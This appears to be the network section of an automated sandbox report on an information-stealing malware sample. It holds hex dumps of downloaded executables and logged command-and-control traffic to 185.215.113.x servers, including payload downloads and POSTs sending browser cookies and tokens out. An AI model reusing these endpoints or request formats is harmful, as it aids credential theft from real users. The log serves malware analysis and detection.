Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 24 Oct 2024 06:38:45 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 24 Oct 2024 06:38:46 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 24 Oct 2024 06:38:47 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 24 Oct 2024 06:38:48 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 42 32 43 37 38 42 37 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79BB2C78B75C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 31 31 33 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1001134001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 31 31 33 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1001135001&unit=246122658369
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFBGDBFBKKJECBFHDGIEHost: 185.215.113.37Content-Length: 209Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 42 47 44 42 46 42 4b 4b 4a 45 43 42 46 48 44 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 30 46 35 33 39 39 31 35 36 45 41 32 30 33 37 39 30 32 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 42 47 44 42 46 42 4b 4b 4a 45 43 42 46 48 44 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 42 47 44 42 46 42 4b 4b 4a 45 43 42 46 48 44 47 49 45 2d 2d 0d 0a Data Ascii: ------KFBGDBFBKKJECBFHDGIEContent-Disposition: form-data; name="hwid"20F5399156EA20379026------KFBGDBFBKKJECBFHDGIEContent-Disposition: form-data; name="build"doma------KFBGDBFBKKJECBFHDGIE--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAAFIIJDAAAAKFHIDAAAHost: 185.215.113.37Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 41 46 49 49 4a 44 41 41 41 41 4b 46 48 49 44 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 64 32 63 63 62 62 65 39 38 63 63 61 31 65 61 62 37 65 65 38 30 30 36 64 36 66 35 35 30 35 63 38 66 35 65 39 62 36 30 66 65 63 62 38 33 34 33 38 37 35 32 30 64 32 39 30 38 30 39 34 64 30 32 38 66 30 36 36 36 66 66 0d 0a 2d 2d 2d 2d 2d 2d 44 41 41 46 49 49 4a 44 41 41 41 41 4b 46 48 49 44 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 44 41 41 46 49 49 4a 44 41 41 41 41 4b 46 48 49 44 41 41 41 2d 2d 0d 0a Data Ascii: ------DAAFIIJDAAAAKFHIDAAAContent-Disposition: form-data; name="token"bd2ccbbe98cca1eab7ee8006d6f5505c8f5e9b60fecb834387520d2908094d028f0666ff------DAAFIIJDAAAAKFHIDAAAContent-Disposition: form-data; name="message"browsers------DAAFIIJDAAAAKFHIDAAA--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFCAAEGDBKJJKECBKFHCHost: 185.215.113.37Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 43 41 41 45 47 44 42 4b 4a 4a 4b 45 43 42 4b 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 64 32 63 63 62 62 65 39 38 63 63 61 31 65 61 62 37 65 65 38 30 30 36 64 36 66 35 35 30 35 63 38 66 35 65 39 62 36 30 66 65 63 62 38 33 34 33 38 37 35 32 30 64 32 39 30 38 30 39 34 64 30 32 38 66 30 36 36 36 66 66 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 41 41 45 47 44 42 4b 4a 4a 4b 45 43 42 4b 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 41 41 45 47 44 42 4b 4a 4a 4b 45 43 42 4b 46 48 43 2d 2d 0d 0a Data Ascii: ------AFCAAEGDBKJJKECBKFHCContent-Disposition: form-data; name="token"bd2ccbbe98cca1eab7ee8006d6f5505c8f5e9b60fecb834387520d2908094d028f0666ff------AFCAAEGDBKJJKECBKFHCContent-Disposition: form-data; name="message"plugins------AFCAAEGDBKJJKECBKFHC--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGDAAEHDHIIJKECBKEBAHost: 185.215.113.37Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 44 41 41 45 48 44 48 49 49 4a 4b 45 43 42 4b 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 64 32 63 63 62 62 65 39 38 63 63 61 31 65 61 62 37 65 65 38 30 30 36 64 36 66 35 35 30 35 63 38 66 35 65 39 62 36 30 66 65 63 62 38 33 34 33 38 37 35 32 30 64 32 39 30 38 30 39 34 64 30 32 38 66 30 36 36 36 66 66 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 41 45 48 44 48 49 49 4a 4b 45 43 42 4b 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 41 45 48 44 48 49 49 4a 4b 45 43 42 4b 45 42 41 2d 2d 0d 0a Data Ascii: ------BGDAAEHDHIIJKECBKEBAContent-Disposition: form-data; name="token"bd2ccbbe98cca1eab7ee8006d6f5505c8f5e9b60fecb834387520d2908094d028f0666ff------BGDAAEHDHIIJKECBKEBAContent-Disposition: form-data; name="message"fplugins------BGDAAEHDHIIJKECBKEBA--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJEBKKEGDBFIIEBFHIEHHost: 185.215.113.37Content-Length: 6563Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/sqlite3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 31 31 33 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1001136001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /test/num.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJECFIECBGDGCAAAEHIEHost: 185.215.113.37Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 64 32 63 63 62 62 65 39 38 63 63 61 31 65 61 62 37 65 65 38 30 30 36 64 36 66 35 35 30 35 63 38 66 35 65 39 62 36 30 66 65 63 62 38 33 34 33 38 37 35 32 30 64 32 39 30 38 30 39 34 64 30 32 38 66 30 36 36 36 66 66 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 56 46 4a 56 52 51 6b 76 43 55 5a 42 54 46 4e 46 43 54 45 32 4f 54 6b 77 4d 54 45 32 4d 54 55 4a 4d 56 42 66 53 6b 46 53 43 54 49 77 4d 6a 4d 74 4d 54 41 74 4d 44 51 74 4d 54 4d 4b 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 4d 77 4f 44 45 31 43 55 35 4a 52 41 6b 31 4d 54 45 39 52 57 59 31 64 6c 42 47 52 33 63 74 54 56 70 5a 62 7a 56 6f 64 32 55 74 4d 46 52 6f 51 56 5a 7a 62 47 4a 34 59 6d 31 32 5a 46 5a 61 64 32 4e 49 62 6e 46 57 65 6c 64 49 51 56 55 78 4e 48 59 31 4d 30 31 4f 4d 56 5a 32 64 33 5a 52 63 54 68 69 59 56 6c 6d 5a 7a 49 74 53 55 46 30 63 56 70 43 56 6a 56 4f 54 30 77 31 63 6e 5a 71 4d 6b 35 58 53 58 46 79 65 6a 4d 33 4e 31 56 6f 54 47 52 49 64 45 39 6e 52 53 31 30 53 6d 46 43 